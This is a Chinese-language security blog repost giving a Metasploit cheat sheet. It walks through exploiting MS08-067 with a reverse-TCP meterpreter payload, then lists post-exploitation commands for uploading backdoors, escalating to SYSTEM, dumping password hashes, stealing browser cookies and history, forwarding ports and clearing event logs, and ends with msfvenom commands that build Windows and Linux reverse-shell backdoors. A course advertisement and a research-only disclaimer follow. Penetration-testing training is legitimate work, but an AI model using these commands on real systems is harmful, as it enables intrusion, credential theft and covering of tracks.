MSF常用命令

admin 2024年9月25日10:04:08评论25 views字数 2583阅读8分36秒阅读模式

点击上方蓝字,后台回复合集获取网安资源

MSF常用命令

msf获取shell

启动 msfconsole搜索某个模块 search ms08-067使用某个模块 use exploit/windows/smb/ms08-067_netapi查看当前模块可以使用的payload[可以省略] show payloads查看当前模块需要的参数配置 show options[可略]选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp设置目标的IP地址 set RHOST 192.168.10.1设置本地的IP地址 set LHOST 192.168.1.1设置本地的监听端口 set LPORT 8888show targets 查看metasploit的渗透攻击模块通常可以列出受到漏洞影响的目标系统类型。如某些漏洞只适用特定系统的某些版本,这时可以根据目标的操作类型版本来设置版本 set target 1进行攻击 run/exploit,这样就返回一个meterpreter

meterpreter常用命令

1、background:把meterpreter后台挂起2、sessions:查看已经成功获取的会话   sessions -i +num :连接到指定序列号的meterpreter会话继续利用   sessions -i  2:连接第三个会话主机3、shell:获取目标主机的远程命令行shell,使用exit退出当前的shell4、cat:查看目标主机上的文档内容      cat c:/test.txt5、getwd:获取系统工作的当前目录6、upload:上传文件到目标主机     upload  setup.exe  c:\windows\system32  把后门程序setup.exe上传到目标主机的system32目录下7、download:把目标主机上的文件下载到我们的攻击主机上     download  C:\boot.in  /root/  把目标主机c盘根目录下的boot.ini文件下载到攻击主机的/root/目录下8、edit:调用vi编辑器,对目标主机的文件进行修改     edit C:/Windows/System32/drivers/etc/hosts   修改目标主机的hosts文件9、search: 再目标主机上搜索文件          search   -d   c:\  -f *.doc      在目标主机的C盘下搜索doc文档10、ipconfig/ifconfig:查看目标主机上的网络参数11、portfwd:端口转发,把目标主机的3389端口转发到其他端口       portfwd add -l 1122 -p 3389 -r 192.168.10.1       把目标主机的3389端口转发到192.168.10.1的1122端口,访问192.168.10.1:1122就能打开目标主机的远程桌面12、route:显示目标主机上的主机路由表13、getuid:显示目标主机上的主机路由表14、sysinfo:查看目标主机的系统信息15、getpid:获取meterpreter会话在 目标主机上的注入进程的进程号16、migrate:将meterpreter会话进程移植到另外一个进程    如果我们反弹的meterpreter会话是对方打开了一个预设代码的word文档产生的,如果对方一旦关闭该word文档,我们获取的meterpreter会话就      会关闭,所以我们需要把会话进程注入到explorer.exe(桌面进程    先用ps 查看explorer.exe进程的pid为 xxx,    然后执行  migrate xxx17、execute:在目标主机上运行某个程序           execute -f -i -H cmd.exe  以隐藏的方式运行cmd.exe18、shutdown:关闭目标主机19、getsystem:使用该命令提升当前进程的执行账户为system用户, 拿到系统的最高权限20、hashdump:在获得system权限的情况下,使用hashdump命令可以得到目标的SAM文件,获取目标主机账号密码的hash信息21、run  post/windows/gather/checkvm       在meterpreter下run post/windows/gather/checkvm 检测是否为一台虚拟机22、run post/windows/gather/enum_applications        在meterpreter下run post/windows/gather/enum_applications  获取目标主机上的软件安装信息23、run post/windows/gather/dumplinks       在meterpreter下run post/windows/gather/dumplinks  获取目标主机最近访问过的文档、链接等信息24、run post/windows/gather/enum_ie         在meterpreter下run post/windows/gather/enum_ie         获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf5/loot/目录下25、clearev命令:入侵痕迹清除

MSF生成后门

1、生成windows后门:       msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击端口  -f exe -o /tmp/hack.exe2、生成linux后门       msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击ip LPORT=攻击端口  -f elf > shell.elfuse  exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.1.53set LPORT 4444exploit

内容源自菜鸟小新,侵删

MSF常用命令
今日福利
内部福利!仅需6.9元解锁↓↓

【Django核心探秘】3天训练营🔥

👉Socket通信原理,通过实例学习CS编程

👉运用多线程并发技术解决IO的难点痛点

👉对HTTP请求进行解析

👉对Response进行封装

👉解析Django模板技术本质

上课赠redis纸质书+Python语法视频大合集

扫码立即报名,获取上课链接👇

MSF常用命令

MSF常用命令

END

MSF常用命令MSF常用命令

原文始发于微信公众号(马哥网络安全):MSF常用命令

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日10:04:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSF常用命令https://cn-sec.com/archives/3203412.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息